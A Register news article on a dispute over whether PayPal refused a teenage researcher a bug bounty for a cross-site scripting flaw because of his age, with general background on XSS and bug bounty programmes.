PayPal denies stiffing bug-hunting teen on bounty

Someone else got there first, claims firm


PayPal has denied that it refused a teenage security researcher a reward for finding a potentially nasty bug on the basis that he was too young. The payments processing firm said that while it had denied the 17-year-old a reward, it was because another researcher had already reported the flaw.

Robert Kugler, 17, found a cross-site scripting flaw on the payment processing firm's website before claiming a reward under PayPal's bug bounty programme.

Initially, Kugler claimed PayPal had told him in an email that he was ineligible for a reward because he was too young.

The terms and conditions for the reward scheme do not mention anything about the bounty being restricted to those over 18.

The German student recently published details of the bug, along with what he claimed were extracts from his email correspondence with PayPal, on a full disclosure mailing list, provoking damaging headlines along the lines of "PayPal Stiffs Teen Who Found Website Bug".

In response to queries from El Reg, PayPal said Kugler had been denied the reward not because he was too young, but because someone else had previously reported the same flaw, directly contradicting Kugler's account.

The eBay payments subsidiary said it was resolving the vulnerability, stressing that there was no evidence that it had been abused in any attacks to date and therefore no need for undue concern.

While we always appreciate contributions by the security community to PayPal's Bug Bounty Program, we reward participants when they are the first to report valid security vulnerabilities.

In this specific situation, the cross-site scripting vulnerability was already discovered by another security researcher, so [the bug] would not have been eligible for payment, regardless of age [of the researcher], as we must honour the original researcher that provided the vulnerability.

We appreciate the security researcher's efforts and this situation illustrates that PayPal can do more to recognise younger security researchers around the world. As a first step, we are sending an official letter of recognition for the researcher's contribution and we are exploring other ways to recognise younger security researchers when they do discover a vulnerability and responsibly disclose that discovery.

PayPal's conditions do state that its bounty is only awarded to the first person that discovers the previously unknown bug. El Reg asked PayPal which researcher was first to report this bug, as well as how many bug bounties it had paid out. It declined to answer both questions, so we're none the wiser.

"PayPal does not share the details on the researchers or the number of bugs found," a spokesman said.

Kugler said he is less than impressed with PayPal's handling of his vulnerability report and how it runs its bug bounty programme more generally.

"It's a strange behaviour from PayPal," Kugler told El Reg. He claimed: "In my email correspondence with PayPal, no one ever mentioned someone else found the bug! They only said: 'You're disqualified because of being 17 years old'."

He went on to claim: "After all that media attention they introduced: 'No, we disqualified his bug because someone else already found it, not for being 17 years old'. Maybe it's just me, but I think they just want to avoid the payment. Two security researchers (one from China and one from India) found the same bug and always the same reply: Someone else found it, we are sorry!"

XSS marks the spot

Cross-site scripting (XSS) vulnerabilities arise from web application development mistakes. Attackers can exploit XSS vulns to inject scripts or pop-ups from untrusted sites that would appear to surfers as originating from the site they are visiting. XSS flaws are a common vuln, most regularly abused in phishing attacks.

The cross-site scripting flaw in the search function on PayPal's German site which Kugler (and perhaps others) discovered is a bit more serious, however, because it is capable of being abused to access credentials.

"An XSS attack occurs when a script drawn from another website is allowed to run but should not," Kugler explained. "The type of flaw can be used to steal information or potentially cause other malicious code to run."

The PayPal XSS bug was fixed on Wednesday, according to Kugler.

A bug's life

Bug bounty programmes have become commonplace across the industry over recent years. The schemes offer an incentive for researchers to report flaws to vendors, rather than selling details of them on vulnerability marketplaces to whoever stumps up enough cash.

Google, in particular, is an expert at attracting media attention to its own bug bounty programme. PayPal, by contrast, is reluctant to talk about its own vulnerability reward scheme, perhaps because the nature of its payment-handling business makes it reluctant to get drawn into a any kind of discussion about the security of its website.

The only known recipient of a bug bounty from PayPal is Germany-based security research outfit Vulnerability Laboratory, which earned a $3,000 reward back in January after discovering and reporting a critical bug to PayPal five months prior.

The flaw, a SQL injection vulnerability in the official PayPal GP+ Web Application Service, created a potential mechanism for hackers to inject commands through the compromised web app into the backend databases, potentially tricking them into coughing up sensitive data in the process.

Although he struck out when he reported a problem to PayPal, Kugler has successfully collaborated with other vendors.

The German teen has received a $3,000 award from Mozilla for finding a privilege escalation bug in Firefox, and another $1,500 for locating a separate flaw in Mozilla Updater. He also received a hat tip for security research from Microsoft, getting a shout out on its list of security researchers - though no financial reward for his efforts as yet.

"IT security is an interesting topic and I like to test things," Kugler told El Reg. "Sometimes things work differently under special circumstances, it's exciting to study this behaviour." ®

* Additional reporting by Iain Thomson

Similar topics


Other stories you might like

  • Pentester pops open Tesla Model 3 using low-cost Bluetooth module
    Anything that uses proximity-based BLE is vulnerable, claim researchers

    Tesla Model 3 and Y owners, beware: the passive entry feature on your vehicle could potentially be hoodwinked by a relay attack, leading to the theft of the flash motor.

    Discovered and demonstrated by researchers at NCC Group, the technique involves relaying the Bluetooth Low Energy (BLE) signals from a smartphone that has been paired with a Tesla back to the vehicle. Far from simply unlocking the door, this hack lets a miscreant start the car and drive away, too.

    Essentially, what happens is this: the paired smartphone should be physically close by the Tesla to unlock it. NCC's technique involves one gadget near the paired phone, and another gadget near the car. The phone-side gadget relays signals from the phone to the car-side gadget, which forwards them to the vehicle to unlock and start it. This shouldn't normally happen because the phone and car are so far apart. The car has a defense mechanism – based on measuring transmission latency to detect that a paired device is too far away – that ideally prevents relayed signals from working, though this can be defeated by simply cutting the latency of the relay process.

    Continue reading
  • Google assuring open-source code to secure software supply chains
    Java and Python packages are the first on the list

    Google has a plan — and a new product plus a partnership with developer-focused security shop Snyk — that attempts to make it easier for enterprises to secure their open source software dependencies.

    The new service, announced today at the Google Cloud Security Summit, is called Assured Open Source Software. We're told it will initially focus on some Java and Python packages that Google's own developers prioritize in their workflows. 

    These two programming languages have "particularly high-risk profiles," Google Cloud Cloud VP and GM Sunil Potti said in response to The Register's questions. "Remember Log4j?" Yes, quite vividly.

    Continue reading
  • Rocket Lab is taking NASA's CAPSTONE to the Moon
    Mission to lunar orbit is further than any Photon satellite bus has gone before

    Rocket Lab has taken delivery of NASA's CAPSTONE spacecraft at its New Zealand launch pad ahead of a mission to the Moon.

    It's been quite a journey for CAPSTONE [Cislunar Autonomous Positioning System Technology Operations and Navigation Experiment], which was originally supposed to launch from Rocket Lab's US launchpad at Wallops Island in Virginia.

    The pad, Launch Complex 2, has been completed for a while now. However, delays in certifying Rocket Lab's Autonomous Flight Termination System (AFTS) pushed the move to Launch Complex 1 in Mahia, New Zealand.

    Continue reading

Biting the hand that feeds IT © 1998–2022